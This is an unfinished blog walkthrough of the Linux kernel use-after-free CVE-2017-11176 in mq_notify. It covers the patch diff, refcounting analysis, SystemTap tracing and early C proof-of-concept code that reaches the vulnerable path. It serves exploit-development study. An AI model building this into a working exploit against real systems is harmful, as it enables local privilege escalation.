[ON-GOING] CVE-2017-11176 N-Day Walkthrough
2024-08-24
Intro
With courses completed, books read, and even more training under my belt, I’ve been eager to get my hands dirty and dive into kernel exploitation with a walkthrough of CVE-2017-11176.
I’ve taken several courses:
- Heap Labs (Parts 1-3)
- OSED
- RET2System Wargames
And I’ve read:
- A Guide to Kernel Exploitation: Attacking the Core (E. Perla, M. Oldani)
It’s been recommended quite often that a great way to find kernel bugs is to first review older vulnerabilities. The idea is to start with one that’s well-documented to understand the process, then tackle one that’s less documented, and finally, start finding your own. This seems like solid advice, and with some lab practice completed, it makes sense to now apply what I’ve learned.
With that in mind, this CVE has been thoroughly documented in Lexfo’s security blog. It’s split into three parts: analyzing the patch diff, obtaining a primitive write, and achieving a full exploit. This seems like the perfect candidate to guide me through this as if it were an actual N-day vulnerability. I’ll be documenting the entire process here in this blog post. Enjoy!
Core Concepts, Context, Analysis
This section goes over the kernel basics needed to understand the vulnerability.
Process Descriptor task_struct
Each process has a task_struct that holds crucial information about it. This is true for userland processes and kernel threads alike.
struct task_struct {
volatile long state; // process state (running, stopped, ...)
void *stack; // task's stack pointer
int prio; // process priority
struct mm_struct *mm; // memory address space
struct files_struct *files; // open file information
const struct cred *cred; // credentials
// ...
};
File Descriptors, Virtual Function Tables, and Sockets – oh my!
First off, some basics of the kernel and its structures, starting again with task_struct, whose files field tracks the process's open files:
// [include/linux/sched.h]
struct task_struct {
volatile long state;
void *stack;
int prio;
struct mm_struct *mm;
struct files_struct *files;
const struct cred *cred;
// ...
};
A virtual function table (VFT) is a structure composed of function pointers. A common example is file_operations:
struct file_operations {
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
int (*open) (struct inode *, struct file *);
int (*release) (struct inode *, struct file *);
// ...
};
The kernel calls through one of these pointers like this, checking first that it is set:
if (file->f_op->read)
ret = file->f_op->read(file, buf, count, pos);
I also went over the basics of sockets in Linux, as well as the importance of netlink sockets.
Reference Counters
A reference counter keeps track of how many references an object has, so that the object is neither freed while still in use (a use-after-free) nor left allocated forever (a memory leak). Two ways this can go wrong:
- refcounter decreased twice: use-after-free
- refcounter increased twice: memory leak or int-overflow on the refcounter leading to use-after-free
static inline void sock_put(struct sock *sk) {
if (atomic_dec_and_test(&sk->sk_refcnt))
sk_free(sk);
}
Patch diffing
The following patch diff can be seen in the fix:
diff --git a/ipc/mqueue.c b/ipc/mqueue.c
index c9ff943f19abc6..eb1391b52c6f84 100644
--- a/ipc/mqueue.c
+++ b/ipc/mqueue.c
timeo = MAX_SCHEDULE_TIMEOUT;
ret = netlink_attachskb(sock, nc, &timeo, NULL);
- if (ret == 1)
+ if (ret == 1) {
+ sock = NULL;
goto retry;
+ }
if (ret) {
sock = NULL;
nc = NULL;
On its own, the diff doesn't say much. What I can take away is that the vulnerable logic lives in ipc/mqueue.c and that leaving sock != NULL on the retry path can cause a use-after-free. The patch description itself is fairly verbose, and gives me the following:
- The bug is in the retry logic for netlink_attachskb() inside sys_mq_notify()
- The sock refcnt is already released when a retry is needed
- The fd is controllable by user-space
- Some type of race condition is involved
The blog also picked up on the following:
- There is something wrong with the refcounting of the sock variable, leading to a use-after-free
The Vulnerable Code
I tried to see if I could spot the issue myself first. After all, I had all the information I needed from the patch notes.
Some questions to ask are:
- What is the vulnerable syscall?
- What exactly does the logic assume?
- What mitigations might I have to bypass?
If this code path is hit with sock != NULL, what happens? We end up at the out label:
out:
if (sock) {
netlink_detachskb(sock, nc); // <--- Start
} else if (nc) {
dev_kfree_skb(nc);
}
// Next --->
void netlink_detachskb(struct sock *sk, struct sk_buff *skb) {
kfree_skb(skb); // <-- Free's skb
sock_put(sk); // <-- Go here.
}
// Next --->
/* Ungrab socket and destroy it, if it was the last reference. */
static inline void sock_put(struct sock *sk) {
if (atomic_dec_and_test(&sk->sk_refcnt))
sk_free(sk);
}
All in all, this just decreases sk->sk_refcnt by 1, and frees the sock if the counter reaches zero. The blog then asks where the reference counter is incremented in the first place, which leads to:
sock = netlink_getsockbyfilp(filp);
Now, where is the counter incremented by 1?
/*
* Start netlink_getsockbyfilp(f.file);
*/
sock = netlink_getsockbyfilp(f.file);
fdput(f);
/*
* Start netlink_getsockbyfilp(f.file);
* \_netlink_getsockbyfilp
*/
struct sock *netlink_getsockbyfilp(struct file *filp) {
struct inode *inode = file_inode(filp);
struct sock *sock;
if (!S_ISSOCK(inode->i_mode))
return ERR_PTR(-ENOTSOCK);
sock = SOCKET_I(inode)->sk;
if (sock->sk_family != AF_NETLINK)
return ERR_PTR(-EINVAL);
sock_hold(sock);
return sock;
}
/*
* Start netlink_getsockbyfilp(f.file);
* \_netlink_getsockbyfilp
* \_sock_hold
*/
static inline void sock_hold(struct sock *sk) {
atomic_inc(&sk->sk_refcnt); // Increment ref counter by 1.
}
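With the decrement and the increment now scoped out, the blog dives into how the vulnerability becomes possible. Remember that this is a race condition: if we close() the socket's fd midway through the goto retry path, the second fdget() fails and the code jumps to out with sock still set, so a reference that was already released gets dropped a second time. That is what triggers the UAF.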
PoC time
How do we even enter this code path?
From userland to kernel:
SYSCALL_DEFINE2(mq_notify, mqd_t, mqdes, const struct sigevent __user *, u_notification) {
int ret;
struct file *filp;
struct sock *sock;
struct inode *inode;
struct sigevent notification;
struct mqueue_inode_info *info;
struct sk_buff *nc;
if (u_notification) { // Condition to pass
if (copy_from_user(&notification, u_notification,
sizeof(struct sigevent)))
return -EFAULT;
}
Next, the provided userland structure is validated:
nc = NULL;
sock = NULL;
if (u_notification != NULL) { // Not NULL
if (unlikely(notification.sigev_notify != SIGEV_NONE &&
notification.sigev_notify != SIGEV_SIGNAL &&
notification.sigev_notify != SIGEV_THREAD)) // must be one of the three known types
return -EINVAL;
if (notification.sigev_notify == SIGEV_SIGNAL &&
!valid_signal(notification.sigev_signo)) { // SIGEV_SIGNAL needs a valid signal number
return -EINVAL;
}
if (notification.sigev_notify == SIGEV_THREAD) { // SIGEV_THREAD is set
long timeo;
/* create the notify skb */
nc = alloc_skb(NOTIFY_COOKIE_LEN, GFP_KERNEL);
if (!nc) {
ret = -ENOMEM;
goto out;
}
if (copy_from_user(nc->data,notification.sigev_value.sival_ptr, NOTIFY_COOKIE_LEN)) { // is valid?
ret = -EFAULT;
goto out;
}
With a stub exploit set up, the call fails with -EBADF. That error can be returned from a few places, so we'll need to attach to the kernel to debug. The stub wasn't too hard to write, although setting the correct parameters for the structure was interesting.
/*
# gcc -lrt -O0 exploit.c -o pwn
# ./pwn
[ CVE-2017-11176 ]
mq_notify failed: : Bad file descriptor
"-EBADF"
*/
#include <mqueue.h>
#include <stdio.h>
#include <string.h>
#define SIGEV_THREAD 2
#define NOTIFY_COOKIE_LEN 32
int main(int argc, char **argv){
struct sigevent sigev;
char sival_buffer[NOTIFY_COOKIE_LEN];
printf("[ CVE-2017-11176 ]\n");
memset(&sigev, 0, sizeof(sigev));
sigev.sigev_notify = SIGEV_THREAD;
sigev.sigev_value.sival_ptr = sival_buffer;
if (mq_notify((mqd_t)-1, &sigev)) {
perror("mq_notify failed: ");
return 1;
}
printf("\nmqnotify succeed\n");
return 0;
}
System Tap
I’ve never used SystemTap before, so this is all new to me. Apparently it’s used for live probing of the kernel without going into gdb. It looks like mq_notify is being called as intended, with -1 and the userland address as parameters.
(4291-4291) >>> mq_notify (-1, 0x7ffff7129bf0)
(4291-4291) <<< mq_notify = fffffffffffffff7
Next, also hook the other kernel functions along this path that could raise -EBADF errors.
(6810-6810) >>> mq_notify (-1, 0x7ffe77695d30)
(6810-6810) [uland] ==>> copy_from_user (n=? from=? to=?)
(6810-6810) [skb] ==>> alloc_skb (priority=? size=?)
(6810-6810) [uland] ==>> copy_from_user (n=? from=? to=?)
(6810-6810) [skb] ==>> skb_put (skb=0xffff880036a77f00 len=0x20)
(6810-6810) [skb] <<== skb_put (return=0xffff880036787200)
(6810-6810) [vfs] ==>> fdget (fd=?)
(6810-6810) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff88005daa7200)
(6810-6810) [netlink] <<== netlink_getsockbyfilp (return=0xffff88007ad8b800)
(6810-6810) [netlink] ==>> netlink_attachskb (sk=0xffff88007ad8b800 skb=0xffff880036a77f00 timeo=0xffff88007b1a7f08 ssk=0x0)
(6810-6810) [netlink] <<== netlink_attachskb (return=0x0)
(6810-6810) [vfs] ==>> fdget (fd=?)
(6810-6810) [netlink] ==>> netlink_detachskb (sk=0xffff88007ad8b800 skb=0xffff880036a77f00)
(6810-6810) [netlink] <<== netlink_detachskb ()
(6810-6810) <<== mq_notify = fffffffffffffff7
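To capture all the different system calls and kernel functions, I used the following SystemTap script. Note that the probes filter on execname() == "exploit", so they only fire for a binary with that name.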
$ sudo stap -v mqnotify.stp
probe syscall.mq_notify {
if (execname() == "exploit"){
printf("\n\n(%d-%d) ==> mq_notify (%s)\n", pid(), tid(), argstr)
}
}
probe syscall.mq_notify.return {
if (execname() == "exploit") {
printf("(%d-%d) <<== mq_notify = %x\n\n\n", pid(), tid(), $return)
}
}
probe kernel.function ("fdget"){
if (execname() == "exploit"){
printf("(%d-%d) [vfs] ==>> fdget (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_detachskb"){
if (execname() == "exploit"){
printf("(%d-%d) [netlink] ==>> netlink_detachskb (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_detachskb").return{
if (execname() == "exploit"){
printf("(%d-%d) [netlink] <<== netlink_detachskb (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("netlink_getsockbyfilp"){
if (execname() == "exploit"){
printf("(%d-%d) [netlink] ==>> netlink_getsockbyfilp (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_getsockbyfilp").return{
if (execname() == "exploit"){
printf("(%d-%d) [netlink] <<== netlink_getsockbyfilp (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("netlink_attachskb"){
if (execname() == "exploit"){
printf("(%d-%d) [netlink] ==>> netlink_attachskb (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("netlink_attachskb").return{
if (execname() == "exploit"){
printf("(%d-%d) [netlink] <<== netlink_attachskb (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("skb_put"){
if (execname() == "exploit"){
printf("(%d-%d) [skb] ==>> skb_put (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("skb_put").return{
if (execname() == "exploit"){
printf("(%d-%d) [skb] <<== skb_put (%s)\n", pid(), tid(), $$return)
}
}
probe kernel.function ("copy_from_user"){
if (execname() == "exploit"){
printf("(%d-%d) [uland] ==>> copy_from_user (%s)\n", pid(), tid(), $$parms)
}
}
probe kernel.function ("alloc_skb"){
if (execname() == "exploit"){
printf("(%d-%d) [skb] ==>> alloc_skb (%s)\n", pid(), tid(), $$parms)
}
}
Call the system call directly instead of going through the libc wrapper, as the wrapper was causing some issues.
// ...
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
// ...
if (_mq_notify((mqd_t)-1, &sigev)) {
perror("mq_notify failed: ");
return 1;
}
// ...
Trigger the bug
#define _GNU_SOURCE // must come before any #include to take effect
#include <mqueue.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/netlink.h>
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)
#define NOTIFY_COOKIE_LEN 32
int main(int argc, char **argv){
struct sigevent sigev;
char sival_buffer[NOTIFY_COOKIE_LEN];
int sock_fd;
if (( sock_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_GENERIC)) < 0 ) {
perror("socket failed: ");
return 1;
}
printf("[ CVE-2017-11176 ]\n");
printf("sock_fd created: %d\n", sock_fd);
memset(&sigev, 0, sizeof(sigev));
sigev.sigev_notify = SIGEV_THREAD;
sigev.sigev_value.sival_ptr = sival_buffer;
sigev.sigev_signo = sock_fd; // with SIGEV_THREAD, the kernel takes the target socket fd from sigev_signo
printf("sigev: %p\n", (void *)&sigev);
if (_mq_notify((mqd_t)-1, &sigev)) {
perror("mq_notify failed: ");
return 1;
}
printf("\nmqnotify succeed\n");
return 0;
}
(9766-9766) >>> mq_notify (4294967295, 0x7fff7b8a77a0)
(9766-9766) [uland] ==>> copy_from_user ()
(9766-9766) [skb] ==>> alloc_skb (priority=? size=?)
(9766-9766) [uland] ==>> copy_from_user ()
(9766-9766) [skb] ==>> skb_put (skb=0xffff8800366a9400 len=0x20)
(9766-9766) [skb] <<== skb_put (return=0xffff88003692ac00)
(9766-9766) [vfs] ==>> fdget (fd=?)
(9766-9766) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff8800312a5300)
(9766-9766) [netlink] <<== netlink_getsockbyfilp (return=0xffff8800513ca000)
(9766-9766) [netlink] ==>> netlink_attachskb (sk=0xffff8800513ca000 skb=0xffff8800366a9400 timeo=0xffff88002ea27f08 ssk=0x0)
(9766-9766) [netlink] <<== netlink_attachskb (return=0x0)
(9766-9766) [vfs] ==>> fdget (fd=?)
(9766-9766) [netlink] ==>> netlink_detachskb (sk=0xffff8800513ca000 skb=0xffff8800366a9400)
(9766-9766) [netlink] <<== netlink_detachskb ()
(9766-9766) <<== mq_notify = fffffffffffffff7